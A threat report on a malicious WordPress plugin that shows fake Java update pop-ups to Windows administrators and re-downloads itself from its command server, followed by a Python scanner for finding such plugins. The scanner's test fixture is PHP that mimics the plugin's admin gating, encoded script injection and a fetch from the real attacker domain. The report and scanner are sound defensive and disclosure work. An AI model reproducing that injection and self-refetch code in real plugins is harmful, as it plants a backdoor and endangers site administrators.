A malicious WordPress plugin named Modern Recent Posts was found injecting Base64-encoded JavaScript into the wp-admin dashboard to display fake browser/Java update pop-ups and force downloads from attacker-controlled domains. The campaign is served from the C2 domain persistancejs[.]store (observed on 28 sites), targets logged-in administrators on Windows, and includes a self-delete-and-re-download mechanism that lets the attacker update or remove the plugin at will. #ModernRecentPosts #persistancejs.store
Keypoints
- The malicious plugin impersonates a benign widget called “Modern Recent Posts” and was installed without the site owner’s knowledge.
- The plugin injects a Base64-encoded JavaScript payload into the wp-admin dashboard and runs it in the administrator’s browser context.
- Delivery is targeted: the payload only executes for logged-in administrators on Windows. The plugin gates the injection on is_admin() and current_user_can('manage_options'), and detects Windows by matching the strings "Windows", "Win32" or "Win64".
- The injected script displays convincing fake update overlays (e.g., “Critical Java Update Required”) that initiate forced downloads from attacker-controlled domains like secure-java-update[.]com.
- The plugin implements a remote update/persistence mechanism: a request carrying ?upd=1 makes it delete its own files and directory recursively and immediately re-download a fresh copy from persistancejs[.]store, letting the attacker push updates or clean up traces.
- Impact includes a persistent backdoor on the WordPress site and the risk of infecting administrators' local machines with RATs, stealers or ransomware if they run the file the fake update button downloads.
MITRE Techniques
- [T1059.007] Command and Scripting Interpreter: JavaScript – The plugin injects and executes Base64-encoded JavaScript inside the admin browser, allowing arbitrary attacker-supplied script execution ('downloads a base64-encoded JavaScript payload from the attacker's server').
- [T1105] Ingress Tool Transfer – The campaign fetches malicious code and payloads from external domains (C2/payload hosting) into the victim environment ('download a base64-encoded JavaScript payload from the attacker's server').
- [T1071.001] Application Layer Protocol: Web Protocols – The plugin communicates with and retrieves payloads from HTTP(S) endpoints hosted at the attacker domain, e.g., persistancejs[.]store/jsplug/plugin[.]php ('hxxps://persistancejs[.]store/jsplug/plugin[.]php').
- [T1204.002] User Execution: Malicious Link – Social-engineered overlay prompts and the "UPDATE NOW" button coerce administrators into initiating a download that installs additional malware ('Critical Java Update Required' and the "UPDATE NOW" button triggering a forced download from secure-java-update[.]com).
- [T1505] Server Software Component – The malicious plugin establishes a persistent backdoor on the WordPress server and includes a remote update/self-destruct mechanism to reinstall or update from the attacker C2 ('the plugin deletes its own local files and directory recursively, then immediately downloads a fresh copy from the Command & Control (C2) server persistancejs[.]store').
Indicators of Compromise
- [Domain] C2 and payload hosting – persistancejs[.]store, secure-java-update[.]com
- [URL] Malicious payload endpoint – hxxps://persistancejs[.]store/jsplug/plugin[.]php
- [Plugin name] Malicious plugin installed on sites – Modern Recent Posts
- [Detection count / spread] Evidence of an active campaign – persistancejs[.]store detected on 28 websites
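As an added example (not code from the report, the plugin, or any vendor tool), the scanner below turns the keypoints above (Base64-encoded injection, admin-only and Windows-only gating, the ?upd=1 delete-and-refetch handler) and the indicators above into a file-level triage check over a wp-content/plugins tree. It decodes Base64 runs so that a domain or lure string hidden inside an encoded blob is still caught, which a plain grep for the domains would miss. The regexes and thresholds, the treatment of the lure text as an indicator, and the constructed fixture (including the guess that the Windows check reads the User-Agent header) are assumptions.

```python
"""Triage scanner for WordPress plugin sources: flags hard-coded C2/payload
domains, Base64 blobs that decode to lure text or script, admin-only plus
Windows-only gating, and a ?upd=1 delete-and-refetch handler (added example)."""
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Indicators from the report, kept defanged in source and refanged at runtime.
IOC_DOMAINS = [d.replace("[.]", ".")
               for d in ("persistancejs[.]store", "secure-java-update[.]com")]
LURE_STRINGS = ["Critical Java Update Required", "UPDATE NOW"]

# Heuristic patterns (assumed; tune for your environment).
RE_B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
RE_ADMIN_CAP = re.compile(r"current_user_can\s*\(\s*['\"]manage_options['\"]")
RE_IS_ADMIN = re.compile(r"\bis_admin\s*\(")
RE_WINDOWS = re.compile(r"\b(?:Windows|Win32|Win64)\b")
RE_UPD_PARAM = re.compile(r"\$_(?:GET|REQUEST)\s*\[\s*['\"]upd['\"]")
RE_SELF_DELETE = re.compile(r"\b(?:unlink|rmdir)\s*\(")
RE_REMOTE_FETCH = re.compile(
    r"\b(?:file_get_contents|wp_remote_get|curl_exec|fopen)\s*\(")

def decode_blobs(text):
    """Yield (encoded, decoded) for each Base64 run that decodes cleanly."""
    for m in RE_B64.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield m.group(0), raw.decode("utf-8", errors="replace")

def scan_plugin_source(text):
    """Return a dict of findings for one PHP/JS source; empty means clean."""
    findings = {}
    domains = [d for d in IOC_DOMAINS if d in text]
    if domains:
        findings["ioc_domain"] = domains
    payloads = []
    for enc, dec in decode_blobs(text):
        matched = [s for s in IOC_DOMAINS + LURE_STRINGS if s in dec]
        if matched or "<script" in dec.lower():
            payloads.append({"blob": enc[:12] + "...", "matched": matched})
    if payloads:
        findings["b64_payload"] = payloads
    if (RE_ADMIN_CAP.search(text) and RE_IS_ADMIN.search(text)
            and RE_WINDOWS.search(text)):
        findings["admin_windows_gate"] = True
    if (RE_UPD_PARAM.search(text) and RE_SELF_DELETE.search(text)
            and RE_REMOTE_FETCH.search(text)):
        findings["self_update"] = True
    return findings

def scan_plugins_dir(root):
    """Scan every .php/.js under root; return {relative_path: findings}."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in (".php", ".js"):
            found = scan_plugin_source(path.read_text(errors="replace"))
            if found:
                report[str(path.relative_to(root))] = found
    return report

# Constructed fixtures (not the real plugin).  The first only mirrors the
# behaviours the report lists; reading the OS from the User-Agent is a guess.
_LURE_JS = (b'var u="https://secure-java-update.com/";'
            b'var m="Critical Java Update Required";')
SAMPLE_MALICIOUS = f"""<?php
/* Plugin Name: Modern Recent Posts */
add_action('admin_footer', function () {{
    if (!is_admin() || !current_user_can('manage_options')) return;
    if (!preg_match('/Windows|Win32|Win64/', $_SERVER['HTTP_USER_AGENT'])) return;
    echo '<script>' . base64_decode('{base64.b64encode(_LURE_JS).decode()}') . '</script>';
}});
if (isset($_GET['upd'])) {{
    unlink(__FILE__); rmdir(__DIR__);
    $fresh = file_get_contents('https://persistancejs.store/jsplug/plugin.php');
}}
"""
SAMPLE_BENIGN = """<?php
/* Plugin Name: Recent Posts Widget */
add_action('widgets_init', function () {
    foreach (wp_get_recent_posts(['numberposts' => 5]) as $p) echo esc_html($p['post_title']);
});
"""

def demo():
    """Write both fixtures into a temporary plugins tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = Path(tmp) / "modern-recent-posts"
        good = Path(tmp) / "recent-posts"
        bad.mkdir()
        good.mkdir()
        (bad / "plugin.php").write_text(SAMPLE_MALICIOUS)
        (good / "widget.php").write_text(SAMPLE_BENIGN)
        return scan_plugins_dir(tmp)
```

Run `scan_plugins_dir("/var/www/html/wp-content/plugins")` on a suspect host; `demo()` shows the expected shape of the output, with the constructed malicious fixture raising all four findings and the benign widget raising none. Treat a single finding (for example only `admin_windows_gate`) as a lead, not a verdict; legitimate admin plugins also check `manage_options`, and the value of the check is the combination of gating, encoded payload, and self-update behaviour in one file.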